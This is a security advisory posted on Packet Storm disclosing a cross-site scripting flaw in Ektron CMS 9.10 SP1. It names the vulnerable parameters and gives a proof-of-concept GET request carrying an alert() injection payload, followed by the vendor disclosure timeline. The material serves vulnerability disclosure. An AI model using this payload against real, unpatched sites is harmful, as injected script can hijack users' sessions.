exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ektron CMS 9.10 SP1 Cross Site Scripting

Ektron CMS 9.10 SP1 Cross Site Scripting
Posted May 31, 2015
Authored by Jerold Hoong

Ektron CMS versions 9.10 SP1 build 9.1.0.184.1.102 and below suffer from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 1f2904a76113f1d8e778535c4e4695511af49f099b8ab84bb1889d528eeecb52

Ektron CMS 9.10 SP1 Cross Site Scripting

Change Mirror Download
# Vulnerability type: Cross-site Scripting  
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)
# Credit: Jerold Hoong

# PROOF OF CONCEPT (XSS)

Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1
on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject
arbitrary javascript via the page, action, folder_id and LangType parameters.

GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert
%28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0
&LangType=1033 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
.. [SNIP] ...
Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0;
ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5;
.. [SNIP] ...

# VULNERABLE PARAMETERS:
- page
- action
- folder_id
- LangType

# SAMPLE PAYLOAD
- ';alert("XSS")//

# TIMELINE
– 07/04/2015: Vulnerability found
– 07/04/2015: Vendor informed
– 08/04/2015: Vendor responded and acknowledged
– 28/05/2015: Vendor fixed the issue
– 31/05/2015: Public disclosure
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close